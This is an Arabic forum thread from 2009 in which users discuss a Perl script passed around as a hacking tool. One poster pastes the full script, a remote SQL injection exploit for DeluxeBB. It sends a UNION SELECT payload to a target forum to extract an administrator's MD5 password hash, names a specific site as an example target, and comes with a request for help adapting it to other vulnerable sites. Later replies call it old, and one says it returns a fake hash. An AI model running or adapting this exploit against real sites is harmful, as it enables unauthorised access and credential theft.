الخطر تسرب < ActivePerl

كافي عذاب · #1 01-08-2009, 03:54 PM

من غير مقدمات : في هذا الموضوع ينتهي كل شئ على الانترنت - وانتظروا التجربـ بالتصوير راح أطربقها

ونبي من عنده خبره واسعه في البرمجه في التصدي باخذ الهاش !!!

ما ابي اوضح اكثر من كذا خوفا من المخربين فقط

المهم تابع
الخطر تسرب < ActivePerl

الخبره أجنبيه والعبه عربية

نبي الكل يهتم بالموضوع والنقاش حولهـ

الصريح جداً · #2 02-08-2009, 12:14 AM

.... الله يهديك سويت فيها فلم وخبرة أجنبية ولعبة أمريكية مدري عربية

ActivePerl هذا برنامج مترجم " دعم " البيرل على الويندوز

يستخدم في ترجمة برامج البيرل و تشغيلها على الويندوز , طبعاً كنظام مثل الويندوز فـ ما نحتاجه

لكن الهكر يستخدمونه لترجمة أدوات الاختراق و الاكسبلويتات المكتوبة بلغة البيرل

بالنسبة لـ الأداة المكتوبة بلغة البيرل اللي طاحت بيدك هذي أداة قديمة من قبل 3 سنوات

تنفذ امر وتحط رابط المنتدى او اي سكريبت ويعطيك الـHash أو الباس المشفر بتشفير md5

ولكنه لا يعطيك هذا فعلاً , مجرد هاش مزور لا أعلم طريقة تكوينه لأني ما فكيت الملف وقريته

فما فيه خطر .. وما يحتاج الضجة اللي انت مسويها

شكراً لك

تشآآآو

كافي عذاب · #3 05-08-2009, 05:23 PM

إقتباس:

اقتباس من مشاركة الصريح جداً

	.... الله يهديك سويت فيها فلم وخبرة أجنبية ولعبة أمريكية مدري عربية ActivePerl هذا برنامج مترجم " دعم " البيرل على الويندوز يستخدم في ترجمة برامج البيرل و تشغيلها على الويندوز , طبعاً كنظام مثل الويندوز فـ ما نحتاجه لكن الهكر يستخدمونه لترجمة أدوات الاختراق و الاكسبلويتات المكتوبة بلغة البيرل بالنسبة لـ الأداة المكتوبة بلغة البيرل اللي طاحت بيدك هذي أداة قديمة من قبل 3 سنوات تنفذ امر وتحط رابط المنتدى او اي سكريبت ويعطيك الـHash أو الباس المشفر بتشفير md5 ولكنه لا يعطيك هذا فعلاً , مجرد هاش مزور لا أعلم طريقة تكوينه لأني ما فكيت الملف وقريته فما فيه خطر .. وما يحتاج الضجة اللي انت مسويها شكراً لك تشآآآو

كفيت ووفيت في توضيحك

بس قلنا

الخبره أجنبيه والعبه عربية

خلنا من الثغره : الموجوده او غيرها من ما طرح بمثل اللى عندي

#!/usr/bin/perl
use IO::Socket;

print q{
################################################## ####
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
################################################## ####
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid

هنا يتغير اسم امنتدى المصاب وكسر الادمن فقط perl dbbxpl.pl www.theorangebelt.org/forums /1

};
}

$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM% ملف القالب والرابط لثغره20deluxebb_users%20WHERE%20(uid='".$user ;

print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";

print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";

كوده نبدله : بثغره او خطئ باي شئ مصاب به الموقع مو السكربت

ورفعه بالكود او امر يختص به في التنفيذ

ابيك تفسرها لي : اذا كان عندك فكره عامه بالبرمجة

الموجود ثغره التعليمات بالوردي

؟؟؟
البرنامج عندي من غير تثبيت !! تشغيل الامر باسم Installer
بيس
والبرامج الحديثه شرايك بها بنفس البرنامج

الصريح جداً · #4 06-08-2009, 02:50 AM

هذا الملف اللي نزلته عبارة عن ثغرة Sql Injection بغض النظر عن كونها تنفذ عبر البيرل

ولا يدوي , ما يفــرق !

والثغرة هذي في نسخة قديمة ..... ما فهمت وش تقصد بآخر كلامك

loverdo · #5 06-08-2009, 11:39 AM

vbulletin Remote SQL Injection Exploit
الحرب على الانترنيت بدات

$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0, pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM% ملف القالب والرابط لثغره20deluxebb_users%20WHERE%20(uid='".$user ;

runvirus · #6 23-08-2009, 08:48 PM

هذه خدعه اخي سبق ونزلت شرح خدعة هذه الثغره فاهي تقوم بعمل HASH وهمي تخدع المخترق انه تمكن من الحصول علي باسورد الموقع وطبعا script kiddz مش فاهم وفرحان انه حصل علي باسورد الموقع :]